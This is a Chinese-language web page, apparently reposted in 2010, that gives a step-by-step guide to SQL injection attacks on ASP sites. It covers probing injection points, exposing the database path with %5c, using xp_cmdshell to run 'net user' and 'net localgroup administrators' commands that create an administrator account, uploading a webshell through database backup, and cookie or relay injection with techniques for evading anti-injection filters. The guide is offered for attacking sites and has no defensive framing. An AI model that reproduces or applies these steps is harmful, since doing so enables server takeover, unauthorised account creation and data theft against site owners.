文章详情

  • 游戏榜单
  • 软件榜单
关闭导航
热搜榜
热门下载
热门标签
php爱好者> php文档>脚本入侵-asp注入漏洞总结

脚本入侵-asp注入漏洞总结

时间:2010-11-20  来源:臭小子

1:注入漏洞
------------
1.asp手工注入
第一步:
先把IE菜单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉。
否则,不论服务器返回什么错误,IE都只显示为HTTP 500服务器错误,不能获得更多的提示信息。
http://site/hack92.asp?id=1
我们在这个地址后面加上单引号’ 然后and 1=1 正确 and 1=2 错误的话就说明存在注入漏洞了!


2:注入点爆库方法
先举个例子一个注入http://site/asp/hack92.asp?id=1
然后改成爆库http://site/asp%5chack92.asp?id=1
利用%5c爆数据库


3:注入点sa权拿服务器
注入点http://site/hack92.asp?id=1
是否存在xp_cmdshell
and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')
--用xp_cmdshell执行命令
;exec master..xp_cmdshell"net user name password /add"--
;exec master..xp_cmdshell"net localgroup name administrators /add"--
当然我们可以直接让工具来帮我们搞定。这一类工具有啊D,Domain,NBSI,HDSI,等等
这几个工具用命令建立账号密码


4:注入点db_owner权限备份webhsell

大家可以去百度搜索db_owner权限备份文章等等 或教程
当然我们可以直接让工具来帮我们搞定。这一类工具有啊D,Domain,NBSI,HDSI,等等
列目录,找网站路径 然后数据库备份上我们的asp小马.大马或一句话。然后得到webshell


5:中转注入和突破防注入程序
我们是否可以用什么方法绕过SQL注入的限制呢
我就说下长用的cookie注入
http://site/hack92.asp?id=1 一个防注入的地址
我们来搭建个www先 然后打开 注入中转生成器
然后选择cookie
注入键名:写参数:id=
注入url地址写上:http://site/hack92.asp
来源页:写上:http://site/hack92.asp
post提交值写上:jmdcw=1
然后点击生成asp 目录就出现了一个jmCook.asp
把文件放在我们的搭建个www里
比如:http://127.0.0.1/jmCook.asp?jmdcw=1 然后注入

方法:
中转注入 有post cookie gel注入
1、运用编码技术绕过
2、通过空格绕过
3、运用字符串判断代替
4、通过类型转换修饰符N绕过
5、通过+号拆解字符串绕过
7、通过IN绕过
8、运用注释语句绕过
9:抓取cookies然后中转
等等!大家可以去百度搜索 工具和教程 文章
突破防注入程序
通用防注入程序都是用”sqlin.asp“这个文件名来做非法记录的数据库
分析程序源码
然后突破
 

 

标签分类:

相关阅读 更多 +
排行榜 更多 +
全民飞机空战手机版

全民飞机空战手机版

飞行射击 下载
弗拉格职业射手手机版

弗拉格职业射手手机版

飞行射击 下载
反射单元2

反射单元2

飞行射击 下载